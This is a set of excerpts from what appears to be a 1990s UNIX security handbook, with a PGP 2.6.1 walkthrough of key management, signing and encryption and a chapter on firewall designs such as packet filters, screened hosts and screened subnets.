..........................++++ ..........++++<br />

Key generation completed.<br />

%<br />

The passphrase is used to encrypt the secret key that is stored on your computer. In this manner, if somebody breaks into your<br />

account or steals your computer, they won't be able to read your encrypted messages.<br />
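If you ever need to change the pass phrase - for example, because you are afraid that somebody watched you type it - you can edit your secret key with PGP's -ke (key edit) option, which lets you change the pass phrase after you supply the old one:

% pgp -ke love@michelle.org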

After you've generated your key, you should do two things with it immediately:

1. Sign it yourself. You should always sign your own key right away. There are some obscure ways that your key might be abused if it is circulated without a signature in place, so be sure that you sign it yourself. Do this as:

% pgp -ks love@michelle.org

2. Generate a revocation certificate and store it offline somewhere. Don't send it to anyone! The idea behind generating the revocation right now is that you still remember the passphrase and have the secret key available. If something should happen to your stored key, or you forget the passphrase, the public/private key pair becomes useless. Having the revocation certificate ready in advance allows you to send it out if that should ever happen. You generate the certificate by:

% pgp -kx Michelle revoke.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.

Distributed by the Massachusetts Institute of Technology.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:06 GMT<br />

Extracting from key ring: `/Users/simsong/Library/pgp/pubring.pgp',<br />

userid "Michelle".<br />

Key for user ID: Michelle Love <love@michelle.org>

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key extracted to file `revoke.pgp'.<br />

% pgp -kd Michelle revoke.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.

Distributed by the Massachusetts Institute of Technology.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:07 GMT<br />

Key for user ID: Michelle Love <love@michelle.org>

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Do you want to permanently revoke your public key<br />

by issuing a secret key compromise certificate<br />

for "Michelle" (y/N)? y<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "Michelle"<br />

Enter pass phrase: every thought burns into substance<br />

Pass phrase is good. Just a moment....<br />

Key compromise certificate created.<br />

Warning: `revoke.pgp' is not a public keyring<br />

Now, save the revoke.pgp file in a safe place, off line. For example, you might put it on a clearly labeled floppy disk, then place<br />

the disk inside a clearly labeled envelope. Write your signature across the envelope's flap. Then store the envelope in your<br />

safe-deposit box.<br />

To extract a printable, ASCII version of your key, use PGP's -kxaf (Key extract ASCII filter) command:<br />

% pgp -kxaf Michelle<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />


Current time: 1995/02/12 04:11 GMT<br />

Extracting from key ring: '/Users/simsong/Library/pgp/pubring.pgp', userid "Mic.<br />

Key for user ID: Michelle Love <love@michelle.org>

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key extracted to file 'pgptemp.$00'.<br />

-----BEGIN PGP PUBLIC KEY BLOCK-----<br />

Version: 2.6.1<br />

mQCNAy89iJMAAAEEALrXJQpVmkTCtjp5FrkCvceFZydiEq2xGgoBvDUOn92XtJiH<br />

PVvope9VA4Lw2wDAbZDD5oucpGg8I1E4luvHVsvF0mpk2JzzWE1hVxWv4rpYIM+x<br />

qSbCryUU5iSneFGPBI5D3nue4wC3XbvQmvYYp5LR6r2eyHU3ktazHzgKllUFAAUR<br />

tCFNaWNoZWxsZSBMb3ZlIDxsb3ZlQG1pY2hlbGxlLm9yZz4=<br />

=UPJB<br />

-----END PGP PUBLIC KEY BLOCK-----<br />

%<br />

You can redirect the output of this command to a file, or simply use your window system's cut-and-paste feature to copy the key<br />

into an email message.<br />
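For example, you might redirect the key to a file and then mail it to a correspondent (the recipient's address here is, of course, only an illustration):

% pgp -kxaf Michelle > mykey.asc
% mail -s "My PGP public key" friend@another.org < mykey.asc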

If you get somebody else's PGP key, you can add it to your keyring with the PGP -ka (key add) option. Simply save the key in a<br />

file, then type:<br />

% pgp -ka michelle.pgp<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:15 GMT<br />

Looking for new keys...<br />

pub 1024/0A965505 1995/02/12 Michelle Love <love@michelle.org>

Checking signatures...<br />

Keyfile contains:<br />

1 new key(s)<br />

One or more of the new keys are not fully certified.<br />

Do you want to certify any of these keys yourself (y/N)? y<br />

Key for user ID: Michelle Love <love@michelle.org>

1024-bit key, Key ID 0A965505, created 1995/02/12<br />

Key fingerprint = 0E 8A 9C C4 CE 44 96 60 83 79 CB F1 F3 02 0C 7E<br />

This key/userID association is not certified.<br />

Do you want to certify this key yourself (y/N)? n<br />

%<br />

6.6.3.3 Encrypting a message<br />

After you have somebody's public key, you can encrypt a message using PGP's -eat option. This will encrypt the message, save it in ASCII (so you can send it with electronic mail), and properly preserve end-of-line characteristics (assuming that this is a text message). You can sign the message with your own digital signature by specifying -seat instead of -eat. If you want to use PGP as a filter, add the letter "f" to your command. This process is shown graphically in Figure 6.6.

Figure 6.6: Encrypting email with PGP<br />

For example, you can take the file message, sign it with your digital signature, encrypt it with Michelle's public key, and send it<br />

to her, by using the command:<br />

% cat message | pgp -seatf Michelle | mail -s message love@michelle.org

6.6.3.4 Adding a digital signature to an announcement<br />

With PGP, you can add a digital signature to a message so that people who receive the message can verify that it is from you<br />

(provided that they have your public key).<br />

For example, if you wanted to send out a PGP-signed message designed to warm the hearts but dull the minds of your students,<br />

you might do it like this:<br />

% pgp -sat classes<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:30 GMT<br />

A secret key is required to make a signature.<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "simson"<br />

Enter pass phrase: all dogs go to heaven

Pass phrase is good.


Key for user ID: Simson L. Garfinkel <br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Just a moment....<br />

Clear signature file: classes.asc<br />

%<br />

The signed message itself looks like this:<br />

% cat classes.asc<br />

-----BEGIN PGP SIGNED MESSAGE-----<br />

Classes are cancelled for the following two months. Everybody enrolled<br />

in the course will get an A.<br />

- -Your Professor<br />

-----BEGIN PGP SIGNATURE-----<br />

Version: 2.6.1<br />

iQCVAwUBLz2Ow3D7CbCQPJJlAQH7CAP/V5COuOPGTDhSeGl6XkxKiVAPD9JDfeNd<br />

5mFr8K/N7W9tyj7THiS/eI92e5/cRI/5z6KzxbSNIx8gGe4h9/bjO5a6rUfa3C+K<br />

j0zCIwETQzSE3tVWXxQv7it4HBZY+xJL8C1CinEckZZc09PvGwyYbPe4tSF8GHHl<br />

0zyTTtueqLg=<br />

=3ihy<br />

-----END PGP SIGNATURE-----<br />

%<br />

6.6.3.5 Decrypting messages and verifying signatures<br />

To decrypt a message or verify a signature on a message, simply save the message into a file. Then run PGP, specifying the<br />

filename as your sole argument. If you are decrypting a message, you will need to type your pass phrase. For example, suppose that you have been sent the following message:

% cat message.asc<br />

-----BEGIN PGP MESSAGE-----<br />

Version: 2.6.1<br />

hIwDcPsJsJA8kmUBBACN/HinvYo1GRL+p6pT14OV3L50q/v1aqGsHHSOa37t89O1<br />

23/jm6lzTuh83Qy5KbMpLkMbRg/5FqTD56GX9MoyP4IuLzKxtuA87n9j/pYv4ES3<br />

I0aCUMOvU8SqNTM1qC+ZV7j6NeseCUiRrMFVVlr5uZ2TH8kkDiQBd0x1/h7LNaYA<br />

AACFsT5sa/rd1uh/1A7yDSqZZNGzlCn0aC55o8lgSoPKOgvT0JGZFFOS5h+v3wxw<br />

/U752OaQaSIIj0rVK8UT0thSxyM8xoMIRmBJgmwoloKI+/THy5/Toy8FIqS5taHu<br />

o0wkuhDwcjNg4PJ3dZkoLwnGWwwM3y5vKqrMFHQfNnO6xJ9qBqnKLg==<br />

=EEko<br />

-----END PGP MESSAGE-----<br />

%<br />

Process the file with PGP:<br />

% pgp message.asc<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/02/12 04:54 GMT<br />


File is encrypted. Secret key is required to read it.

Key for user ID: simson<br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Also known as: Simson L. Garfinkel <br />

You need a pass phrase to unlock your RSA secret key.<br />

Enter pass phrase: subcommander marcos<br />

Pass phrase is good. Just a moment......<br />

Plaintext filename: message<br />

% cat message<br />

Hi Simson!<br />

Things are all set. We are planning the military takeover for next<br />

Tuesday. Bring your lasers.<br />

-Carlos<br />

%<br />

You can also specify the "f" option, which causes PGP to simply send the decrypted file to stdout.<br />
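For example, to read an encrypted message without leaving a decrypted copy on disk, you might run PGP in filter mode and pipe the output into a pager (an illustrative pipeline; PGP will still prompt for your pass phrase on your terminal):

% pgp -f < message.asc | more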

6.6.3.6 PGP detached signatures<br />

PGP has the ability to store digital signatures in a separate file from the original document. Such a signature is called a detached signature. Detached signatures are recommended for binary files, such as programs, because keeping the signature in a separate file leaves the signed file itself unmodified.

For the <strong>UNIX</strong> system administrator, one of the truly valuable things that you can do with PGP is to create detached signatures of<br />

your critical system files. These signatures will be signed by you, the system administrator. You (or other users on your system)<br />

can then use these signatures to detect unauthorized modification in the critical system files: if the files that you sign are ever<br />

modified, the signature will no longer validate.<br />

For example, to create a detached signature for the /bin/login program, you could use PGP's -sb flags:<br />

# pgp -sb /bin/login -u simsong<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/09/12 15:28 GMT<br />

A secret key is required to make a signature.<br />

You need a pass phrase to unlock your RSA secret key.<br />

Key for user ID "simsong@pleasant.cambridge.ma.us"<br />

Enter pass phrase: nobody knows my name<br />

Pass phrase is good.<br />

Key for user ID: Simson L. Garfinkel <br />

1024-bit key, Key ID 903C9265, created 1994/07/15<br />

Also known as: simsong@pleasant.cambridge.ma.us<br />

Also known as: simsong@next.cambridge.ma.us<br />

Also known as: simsong@mit.edu<br />

Just a moment....<br />

Signature file: /bin/login.sig<br />

#<br />


In this example, the superuser ran PGP so that the signature for /bin/login could be recorded in /bin/login.sig (the default<br />

location). You could specify a different location to save the signature by using PGP's -o filename option.<br />

To verify the signature, simply run PGP, supplying the signature and the original file as command line arguments:<br />

% pgp /bin/login.sig /bin/login<br />

Pretty Good Privacy(tm) 2.6.1 - Public-key encryption for the masses.<br />

(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 29 Aug 94<br />

Distributed by the Massachusetts Institute of Technology. Uses RSAREF.<br />

Export of this software may be restricted by the U.S. government.<br />

Current time: 1995/09/12 15:32 GMT<br />

File has signature. Public key is required to check signature.<br />

File '/bin/login.sig' has signature, but with no text.<br />

Text is assumed to be in file '/bin/login'.<br />

.<br />

Good signature from user "Simson L. Garfinkel ".<br />

Signature made 1995/09/12 15:28 GMT<br />

Signature and text are separate. No output file produced.<br />

%<br />

Using digital signatures to validate the integrity of your system's executables is a better technique than using simple<br />

cryptographic checksum schemes, such as MD5. Digital signatures are better because with a simple MD5 scheme, you risk an<br />

attacker's modifying both the binary file and the file containing the MD5 checksums. With digital signatures, you don't have to<br />

worry about an attacker's recreating the signature, because the attacker does not have access to the secret key. (However, you<br />

still need to worry about someone altering the source code of your checksum program to make a copy of your secret key when<br />

you type it.)<br />
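As an illustration, a small shell script along the following lines could check a list of signed files each night and report any file whose detached signature no longer verifies. This is only a sketch: the list of files, the use of the +batchmode option, and the reliance on PGP's exit status are assumptions that you should check against your own PGP installation.

#!/bin/sh
# Verify detached PGP signatures for a few critical system files.
# PGP is assumed to exit with a nonzero status when a signature fails to verify.
for f in /bin/login /bin/su /usr/lib/sendmail
do
        if pgp +batchmode "$f.sig" "$f" >/dev/null 2>&1
        then
                echo "signature OK:      $f"
        else
                echo "SIGNATURE FAILED:  $f"
        fi
done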

NOTE: Protect your key! No matter how secure your encryption system is, you should take the same precautions<br />

with your encryption key that you take with your password: there is no sense in going to the time and expense of<br />

encrypting all of your data with strong ciphers such as DES or RSA if you keep your encryption keys in a file in<br />

your home directory, or write them on a piece of paper attached to your terminal.<br />

Finally, never use any of your passwords as an encryption key! If an attacker learns your password, your encryption<br />

key will be the only protection for your data. Likewise, if the encryption program is weak or compromised, you do<br />

not want your attacker to learn your password by decrypting your files. The only way to prevent this scenario is by<br />

using different words for your password and encryption keys.<br />

Our PGP Keys<br />

One way to verify someone's key is to get it from him or her in person. If you get the key directly from the person involved, you can have some confidence that the key really belongs to that person. Alternatively, you can get the key from a public keyserver, WWW page, or other location, and then verify the key fingerprint. The fingerprint is normally generated as pgp -kvc keyid. You can check it over the telephone, or in person. You can also do it by finding the key fingerprint in a trusted location ... such as printed in a book.

Here are the key IDs and fingerprints for our keys. The keys themselves may be obtained from the public key servers. If you don't know how to access the key servers, read the PGP documentation, or Simson's PGP book, also from O'Reilly.

pub 1024/FC0C02D5 1994/05/16 Eugene H. Spafford <br />

Key fingerprint = 9F 30 B7 C5 8B 52 35 8A 42 4B 73 EE 55 EE C5 41<br />

pub 1024/903C9265 1994/07/15 Simson L. Garfinkel <br />

Key fingerprint = 68 06 7B 9A 8C E6 58 3D 6E D8 0E 90 01 C5 DE 01<br />



Chapter 21

21. Firewalls

Contents:
What's a Firewall?
Building Your Own Firewall
Example: Cisco Systems Routers as Chokes
Setting Up the Gate
Special Considerations
Final Comments

Most systems for providing UNIX network security that we have discussed in this book are designed to protect an individual UNIX host from a hostile network. We have also explored systems such as Kerberos and Secure RPC, which allow a set of hosts to communicate securely in a hostile environment. As an alternative to protecting individual computers on a network, many organizations have opted for a seemingly simpler solution: protecting an organization's internal network from external attack.

The simplest way to protect a network of computers is with physical isolation: avoid the problems of networks by not connecting your hosts to the Internet and not providing dial-in modems. Nobody from the outside will be able to attack your computers without first entering your physical premises. Although this approach completely ignores the damage that insiders can do, it is nevertheless a simple, straightforward policy that has been used by most organizations for years. In many environments, this is still the best way to approach network security - there is little to be gained from connection to outside networks, and much to lose.

Recently, however, the growth of the Internet has made physical isolation more difficult. Employees want email, they want access to Usenet news, and they want to browse the World Wide Web. In addition, organizations want to publish information about themselves on the Web. To allow partial connection to the Internet, while retaining some amount of isolation, some organizations are using firewalls to protect their internal networks.

Firewalls are powerful tools, but they should never be used instead of other security measures. They should only be used in addition to such measures.


21.1 What's a Firewall?<br />

A firewall gives organizations a way to create a middle ground between networks that are completely<br />

isolated from external networks, such as the Internet, and those that are completely connected. Placed

between an organization's internal network and the external network, the firewall provides a simple way<br />

to control the amount and kinds of traffic that will pass between the two.<br />

The term firewall comes from the construction industry. When apartment houses or office buildings are<br />

built, they are often equipped with firewalls - specially constructed walls that are resistant to fire. If a fire<br />

should start in the building, it may burn out of control in one portion, but the firewall will stop or slow<br />

the progress of the fire until help arrives.<br />

The same philosophy can be applied to the protection of local area networks of machines from outside<br />

attack. Used within an organization, a firewall can limit the amount of damage: an intruder may break<br />

into one set of machines, but the firewall will protect others. Erected between an organizational network<br />

and the Internet at large, a firewall prevents a malicious attacker who has gained control of computers

outside the organization's walls from gaining a foothold on the inside. Firewalls seem to make sense<br />

because there is always a "fire" burning somewhere on the Internet.

21.1.1 Default Permit vs. Default Deny<br />

The fundamental function of a firewall is to restrict the flow of information between two networks. To<br />

set up your firewall, you must therefore define what kinds of data pass and what kinds are blocked. This<br />

is called defining your firewall's policy. After a policy is defined, you must then create the actual<br />

mechanisms that implement that policy.<br />

There are two basic strategies for defining firewall policy:<br />

Default permit<br />

With this strategy, you give the firewall the set of conditions that will result in data being blocked.<br />

Any host or protocol that is not covered by your policy will be passed by default.<br />

Default deny<br />

With this strategy, you describe the specific protocols that should be allowed to cross through the<br />

firewall, and the specific hosts that may pass data and be contacted. The rest are denied.<br />

There are advantages and disadvantages to both default permit and default deny. The primary advantage<br />

of default permit is that it is easier to configure: you simply block out the protocols that are "too<br />

dangerous," and rely on your awareness to block new dangerous protocols as they are developed (or<br />

discovered). With default deny, you simply enable protocols as they are requested by your users or<br />

management. Any protocol that isn't being used by your organization might as well be blocked.<br />

Neither default permit nor default deny is a panacea. With both policies, you can create a firewall that is<br />

either secure or insecure, by permitting (or failing to deny) "dangerous" protocols.


21.1.2 Uses of Firewalls<br />

Firewalls are part of a good defense in depth strategy. The idea is to place several layers of protection<br />

between your machines and the potential threats. There are some obvious threats from the outside, so you<br />

should naturally place a firewall between the outside and your internal network(s).<br />

Because a firewall is placed at the intersection of two networks, it can be used for many other purposes<br />

besides simply controlling access. For example:<br />

● Firewalls can be used to block access to particular sites on the Internet, or to prevent certain users or machines from accessing certain servers or services.

● A firewall can be used to monitor communications between your internal network and an external network. For example, you could use the firewall to log the endpoints and amount of data sent over every TCP/IP connection between your organization and the outside world.

● A firewall can even be used to eavesdrop and record all communications between your internal network and the outside world. A 56-kbps leased line at 100% utilization passes only about 605 MB/day, meaning that a week's worth of Internet traffic can easily fit on a single 8mm digital tape. Such records can be invaluable for tracking down network penetrations or detecting internal subversion.[1]

[1] Such records also pose profound privacy questions, and possibly legal ones as well. Investigate these questions carefully before engaging in such monitoring.

● If your organization has more than one physical location and you have a firewall for each location, you can program the firewalls to automatically encrypt packets that are sent over the network between them. In this way, you can use the Internet as your own private wide area network (WAN) without compromising the data; this process is often referred to as creating a virtual private network, or VPN. (You will still be vulnerable to traffic analysis and denial of service attacks, however.)

21.1.3 Anatomy of a Firewall<br />

Fundamentally, all firewalls consist of the following two kinds of components:[2]<br />

[2] The first edition of this book introduced this terminology as part of one of the first<br />

written descriptions of firewalls. Although not everyone in the community has adopted these<br />

terms, we believe that they are at least as descriptive as other terms invented since.<br />

Chokes<br />

Computer or communications devices that restrict the free flow of packets between networks.<br />

Chokes are often implemented with routers, but they do not have to be. The use of the word<br />

"choke" is taken from the field of electronics: a choke is a device that exhibits great resistance to<br />

certain types of signals, but not to others.<br />

Gates<br />

Specially designated programs, devices, or computers within the firewall's perimeter that receive<br />


connections from external networks and handle them appropriately. Other texts on firewalls<br />

sometimes refer to single machines that handle all gate functions as bastion hosts.<br />

Ideally, users should not have accounts on a gate computer. This restriction helps improve the<br />

computer's reliability and users' security.<br />

On the gate(s), you may run one or more of the following kinds of programs:<br />

Network client software<br />

Client software includes programs such as telnet, ftp and mosaic. One of the simplest ways to give<br />

users limited access to the Internet is to allow them to log onto the gate machine and allow them to

run network client software directly. This technique has the disadvantage that you must either<br />

create user accounts on the gate computer, or you must have users share a single account.<br />

Proxy server<br />

A proxy is a program that poses as another. In the case of a firewall, a proxy is a program that<br />

forwards a request through your firewall, from the internal network to the external one.<br />

Network servers<br />

You can also run network servers on your gate. For example, you might want to run an SMTP<br />

server such as sendmail or smap so that you can receive electronic mail. (If you wish to run an<br />

HTTP server to publish information on the World Wide Web, that server should be run on a<br />

separate computer, and not on your gate.)<br />

Many network servers can also function as proxies. They can do so because they implement simple<br />

store-and-forward models, allowing them to forward queries or messages that they cannot handle<br />

themselves. Some servers that can operate easily as proxies include SMTP (because email messages are<br />

automatically forwarded), NNTP (news is cached locally), NTP (time is maintained locally), and DNS<br />

(host addresses are locally cached). The following sections explore a variety of different kinds of firewall<br />

configurations in use today.<br />

21.1.4 Dual-ported Host: The First Firewalls<br />

The first Internet firewalls were UNIX computers equipped with two network ports: one for the internal

network, and one for the external network (see Figure 21.1).<br />

Figure 21.1: Firewall built from a dual-ported host<br />


In this configuration, the UNIX computer functions as both the choke and the gate. Services are provided

to internal users in one of two ways:<br />

● Users can log onto the dual-ported host directly (not a good idea, because users can then compromise the security of the firewall computer).

● The dual-ported host can run proxy servers for the individual services that you wish to pass across the firewall.

To ensure that the computer functions as a choke, the computer must not forward packets from the<br />

external network to the internal network and vice versa. On most UNIX systems using Berkeley-derived

TCP/IP, you can do so by setting the kernel variable ip_forwarding to 0.[3] Unfortunately, some UNIX

systems will still forward packets that have IP source-routing options set. Thus, you should carefully<br />

examine any dual-ported UNIX system that is used as a choke to make sure that it will not forward

packets from one interface to another.<br />

[3] This setting is usually established with a SET in the /etc/system file under SVR4, or with<br />

a small shell and adb script under other systems. See your system documentation for details.<br />

On a Solaris machine, you can disable both IP forwarding and forwarding of source-routed packets by<br />

including the following commands in some start-up file (e.g., in the appropriate file in /etc/rc2.d):[4]<br />

[4] Be careful when you set these variables. The file /etc/init.d/netinit (linked to<br />

/etc/rc2.d/S69inet) also contains explicit settings of the ip_forward variable. To avoid<br />

having your values overwritten, comment out the system code in inet that sets ip_forward,<br />

and put your code in its place.<br />

ndd -set /dev/ip ip_forwarding 0<br />

ndd -set /dev/ip ip_forward_src_routed 0<br />

Note that under SunOS, you need to set ip_forwarding = 0 in the kernel configuration. If you don't, the<br />


kernel will still IP forward under some conditions even if you've set the ip_forwarding variable to 0.<br />

21.1.5 Packet Filtering: A Simple Firewall with Only a Choke<br />

A simple firewall can be built from a single choke (see Figure 21.2.) For example, some organizations<br />

use the packet filtering features available on some routers to block the TCP and UDP packets for certain<br />

kinds of services.<br />

Figure 21.2: Firewall built from a single choke<br />

Programming the choke is straightforward:

● Block all packets for services that are not used.

● Block all packets that explicitly set IP source-routing options.

● Allow incoming TCP connections to your predetermined network servers, but block all others.

● Optionally, allow computers within your organization's network to initiate outgoing TCP connections to any computer on the Internet.

This is a simple configuration that is very popular on today's Internet. Many organizations use a single choke (usually a router) as a firewall for the entire organization.
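To give a flavor of what such rules look like in practice, they might translate into something roughly like the following Cisco-style access list; the chapter's later section, "Example: Cisco Systems Routers as Chokes," covers the real details. The network numbers, interface name, and the single permitted mail server shown here are all invented for the example:

no ip source-route
access-list 101 permit tcp any host 192.168.1.2 eq smtp
access-list 101 permit tcp any 192.168.1.0 0.0.0.255 established
access-list 101 deny ip any any
!
interface Serial0
 ip access-group 101 in

The first permit line admits incoming mail connections to a designated server, the established line lets replies to internally initiated TCP connections back in, and the final deny line implements a default deny stance.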

Packet filtering has a number of advantages:

● It is simple and cheap. Most organizations can build packet filters using routers that they already use to connect their networks to the Internet.

● Packet filtering is flexible. For example, if you discover that a person on a particular subnet, say 204.17.191.0, is trying to break into your computer, you can simply block all access to your network from that subnet. (Of course, this method will only work until the user at the subnet decides to launch an attack against you from another network or begins to forge IP addresses in the packets.)

Packet filters have several disadvantages:

● Filters typically do not have very sophisticated systems for logging the amount of traffic that has crossed the firewall, logging break-in attempts, or giving different kinds of access to different users; however, some routers now include support for logging filter violations through the use of syslog.

● Filter rulesets can be very complex - so complex that you might not know if they are correct or not.

● There is no easy way to test filters except through direct experimentation, which may prove problematical in many situations.

● Packet filters do not handle the FTP protocol well because data transfers occur over high-numbered TCP ports; however, this problem can be alleviated by FTP clients that support the FTP passive mode.

In addition to these disadvantages, there are several fundamental design weaknesses with packet filters:

● If the security of the router is compromised, then all hosts on the internal network are wide open to attack.

● You may not know if the security of the router is compromised because there is no simple way to test the router's configuration tables.

● Although the router may record the number of packets that are passed and blocked, it usually does not record other kinds of useful information.

● The router may allow remote administration. It may not alert you if somebody is repeatedly trying to guess its access password.

● The scheme can easily be defeated with minimal aid from a cooperative (or duped) insider.

● There is no protection against the contents of some connections, such as email or FTP transfer contents.

21.1.6 One Choke, One Gate: Screened Host Architecture<br />

You can build a more secure firewall using a choke and a gate. The gate is a specially chosen computer<br />

on your network at which you run your mail server and any user proxy programs. (WWW servers and<br />

anonymous FTP servers should be run on separate computers, outside the firewall.) The choke can be a<br />

router with two interfaces. For example, a router with two Ethernet interfaces can partition one network<br />

from another. Alternatively, a router with an Ethernet interface and a high-speed serial interface can serve both as the choke and as the organization's connection to an off-site Internet service provider (ISP).[5] (See Figure 21.3.)

[5] Many ISPs will, as a courtesy, maintain the router that connects your network to theirs.<br />


If you allow your ISP to maintain your router, then you should not use it as the basis for<br />

your firewall. Instead, you should have a second router behind the first router that is used<br />

only for security.<br />

Figure 21.3: Traditional firewall with a choke and a gate<br />

Programming is somewhat more complex in this arrangement.<br />

External choke:

● Block packets for services that you do not wish to cross your firewall.

● Block packets that have IP source routing, or that have other "unusual" options set (e.g., record-route).

● Block packets that have your internal network as their destination.

● Only pass packets for which the source or destination IP address is the IP address of the gate.

Gate:

● Runs server proxies to allow users on the inside network to use services on the external network.

● Either acts as a mail server, or receives mail from the external network and forwards it to a specially designed host on the internal network.

With this configuration, the choke is configured so that it will only pass packets between the outside network and the gate. If any computer on your inside network wishes to communicate with the outside, the communication must pass through a special "proxy" program running on the gate.[6] Users on the outside network must connect to the gate before bridging through to your internal network.


[6] We describe one such set of proxies in Chapter 22, Wrappers and Proxies.<br />

21.1.7 Two Chokes and One Gate: Screened Subnet Architecture<br />

For a higher degree of security, some sites have implemented a firewall built from two chokes, as shown<br />

in Figure 21.4.<br />

Figure 21.4: Firewall built from two chokes and one gate

In this configuration, both the external choke and the gate are programmed as before. What's new is the<br />

addition of an internal choke. This second choke is a fail-safe: in the event that an attacker breaks into the<br />

gate and gains control over it, the internal choke prevents the attacker from using the gate to launch<br />

attacks against other computers inside the organization's network.<br />

Programming is similar to that of a single choke:<br />

External choke:

● Block packets for services that you do not wish to cross your firewall.

● Block packets that have IP source routing or that have other "unusual" options set.

● Block packets addressed to your internal network or your internal choke.

● Only pass packets for which the source or the destination IP address is that of the gate.

Gate:

● Runs server proxies to allow users on the inside network to use services on the external network.

● Either acts as a mail server, or sends mail to a specially designed host on the internal network.

Internal choke:

● Block packets for services that you do not wish to cross your firewall.

● Block packets that have IP source routing or that have other "unusual" options set.

● Block packets addressed to the external choke.

● Pass packets for which the source or destination IP address is that of the gate, and for which the ports are for defined proxies on the gate.

● Block everything else.

21.1.8 Multiple Gates<br />

Instead of using a single gate, you can use several gates - one for each protocol. This approach has the<br />

advantage of making the gates easier to administer. However, this approach also increases the number of<br />

machines that must be carefully watched for unusual activity. A simpler approach might be to have a<br />

single gate, but to create individual servers within your organization's network for specific services such<br />

as mail, Usenet, World Wide Web, and so forth.<br />

21.1.9 Internal Firewalls<br />

Instead of putting all your organization's machines on a single local network, you can separate your<br />

installation into sets of independent local area networks. These networks can communicate through<br />

gateway machines, routers, or full-blown firewalls. Alternatively, they can communicate with each other<br />

through independent links to the Internet, using an appropriate encryption system to prevent

eavesdropping by your ISP and others.<br />

Internal firewalls make a lot of sense in a large organization. After all, there is no reason to allow your<br />

research scientists any privileged access to a computer that is used for accounting, or to allow people<br />

who are sitting in front of data-entry terminals to try their hand at breaking into the research and<br />

development department's file servers. With an internal firewall, you can place extra security where<br />

needed.<br />

The goal in setting up independent internal networks should be to minimize the damage that will take<br />

place if one of your internal networks is compromised, either by an intruder or, more likely, by an<br />

insider. By practicing stringent isolation, you can reduce the chances that an attacker will be able to use a<br />

foothold in one network as a beachhead for breaking into others.<br />

A firewall designed for use within an organization is very similar to one that is used to protect an<br />

organization against external threats. However, because the same management team and structure may be<br />

responsible for many networks within an organization, there is a great temptation to share information or<br />

services via an internal firewall, when such information services should in fact be blocked.<br />

Follow these basic guidelines when setting up independent internal networks:<br />

● If you use NIS, make sure that each local area network has its own server. Make sure that each server and its clients have their own netgroup domain.

● Don't let any server or workstation on one network trust hosts on any other network or any gateway machine. (For an explanation of trusted hosts, see "Trusted hosts and users" in Chapter 17, TCP/IP Services.)

● Make certain that users who have accounts on more than one local network have different passwords for each subnet. If possible, use a one-time password scheme or token-based system.

● Enable the highest level of logging for the gateways, and the most restrictive security possible. If possible, do not allow user accounts on the gateway machines.

● Do not NFS-mount filesystems from one LAN onto another LAN. If you absolutely must share a partition, be sure that it is exported read-only (a sketch of such an export follows this list).
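For instance, on a system whose NFS exports are controlled by a SunOS-style /etc/exports file, a read-only export limited to a single netgroup might look roughly like the line below. The directory and netgroup names are invented, and the exact syntax varies from vendor to vendor, so check your own exports(5) documentation (or share(1M) on Solaris 2 systems):

/export/doc -ro,access=lab_net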

Internal firewall machines have many benefits:

● They help isolate physical failure of the network to a smaller number of machines.

● They limit the number of machines putting information on any physical segment of the network, thus limiting the damage that can be done by eavesdropping.

● They limit the number of machines that will be affected by flooding attacks.

● They create barriers for attackers, both external and internal, who are trying to attack specific machines at a particular installation.

Remember: Although most people spend considerable time and money protecting against attacks from<br />

outsiders, dishonest and disgruntled employees are in a position to do much more damage to your<br />

organization. Properly configured internal firewalls help limit the amount of damage that an insider can<br />

do.<br />

In the following text, we'll refer to internal networks and external networks when describing a firewall,<br />

with the understanding that both networks may in fact be internal to your organization.<br />


Chapter 14<br />

14. Telephone <strong>Sec</strong>urity<br />

Contents:<br />

Modems: Theory of Operation<br />

Serial Interfaces<br />

